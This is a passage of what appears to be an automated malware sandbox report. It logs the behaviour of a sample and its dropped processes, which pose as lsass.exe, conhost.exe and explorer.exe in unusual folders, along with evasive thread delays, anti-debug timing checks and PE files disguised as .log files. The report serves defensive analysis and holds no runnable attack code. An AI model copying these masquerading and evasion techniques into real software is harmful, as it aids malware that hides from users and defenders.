                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSpecial instruction interceptor: First address: 14076D336 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeMemory allocated: 1AF0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeMemory allocated: 3620000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeMemory allocated: 3460000 memory reserve | memory write watchJump to behavior
                                    Source: C:\blockhostnet\msinto.exeMemory allocated: 11F0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\blockhostnet\msinto.exeMemory allocated: 1AF30000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeMemory allocated: 21C0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeMemory allocated: 1A440000 memory reserve | memory write watch
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeMemory allocated: 980000 memory reserve | memory write watch
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeMemory allocated: 1A550000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 17E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeMemory allocated: 2D50000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeMemory allocated: 1AFF0000 memory reserve | memory write watch
                                    Source: C:\Windows\debug\explorer.exeMemory allocated: 9A0000 memory reserve | memory write watch
                                    Source: C:\Windows\debug\explorer.exeMemory allocated: 1A480000 memory reserve | memory write watch
                                    Source: C:\blockhostnet\msinto.exeMemory allocated: 1320000 memory reserve | memory write watch
                                    Source: C:\blockhostnet\msinto.exeMemory allocated: 1AF90000 memory reserve | memory write watch
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeMemory allocated: D50000 memory reserve | memory write watch
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeMemory allocated: 1A820000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: FE0000 memory reserve | memory write watch
                                    Source: C:\Recovery\lsass.exeMemory allocated: 1ABA0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeMemory allocated: D50000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeMemory allocated: 1AC10000 memory reserve | memory write watch
                                    Source: C:\Windows\debug\explorer.exeMemory allocated: 12C0000 memory reserve | memory write watch
                                    Source: C:\Windows\debug\explorer.exeMemory allocated: 1B120000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 599888
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 599763
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 599484
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 598922
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 598531
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 597922
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 597656
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 597031
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 596766
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 596531
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 595906
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 595672
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 595234
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 594969
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 594266
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 593641
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 593188
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 592609
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 592250
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 591375
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 590906
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 590567
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 590047
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 589813
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 589150
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 588844
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 588484
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 587911
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 587563
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 587125
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 586375
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 586047
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585759
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585625
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585466
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585339
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585234
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585122
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585011
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584890
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584750
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584639
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584526
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584279
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583958
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583813
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583688
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583563
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583453
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\debug\explorer.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockhostnet\msinto.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWindow / User API: threadDelayed 8091
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeWindow / User API: threadDelayed 1498
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\mFVAeiee.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\iGvrsCDf.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\AEdPygqV.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\SIVCnSke.logJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\kRRssUig.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\JfNMDZUx.logJump to dropped file
                                    Source: C:\blockhostnet\msinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\crpSXvpM.logJump to dropped file
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\admBIJoy.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_2-23845
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exe TID: 5916Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\blockhostnet\msinto.exe TID: 968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 1088Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -3689348814741908s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -599888s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -599763s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -599484s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -598922s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3380Thread sleep time: -32400000s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -598531s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -597922s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -597656s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -597031s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -596766s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -596531s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -595906s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -595672s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -595234s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -594969s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -594266s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -593641s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -593188s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -592609s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -592250s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -591375s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -590906s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -590567s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -590047s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -589813s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -589150s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -588844s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -588484s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -587911s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -587563s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -587125s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -586375s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -586047s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -585759s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -585625s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -585466s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -585339s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -585234s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -585122s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -585011s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -584890s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -584750s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -584639s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -584526s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -584279s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -583958s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -583813s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -583688s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -583563s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 3632Thread sleep time: -583453s >= -30000s
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe TID: 5960Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 1340Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\debug\explorer.exe TID: 5924Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\blockhostnet\msinto.exe TID: 7008Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe TID: 400Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\lsass.exe TID: 4972Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe TID: 2192Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\debug\explorer.exeLast function: Thread delayed
                                    Source: C:\blockhostnet\msinto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\debug\explorer.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\blockhostnet\msinto.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\lsass.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\debug\explorer.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_0083A69B
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_0084C220
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0085B348 FindFirstFileExA,2_2_0085B348
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084E6A3 VirtualQuery,GetSystemInfo,2_2_0084E6A3
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 30000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 599888
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 599763
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 599484
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 598922
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 598531
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 597922
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 597656
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 597031
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 596766
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 596531
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 595906
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 595672
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 595234
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 594969
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 594266
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 593641
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 593188
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 592609
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 592250
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 591375
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 590906
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 590567
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 590047
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 589813
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 589150
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 588844
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 588484
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 587911
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 587563
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 587125
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 586375
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 586047
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585759
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585625
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585466
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585339
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585234
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585122
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 585011
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584890
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584750
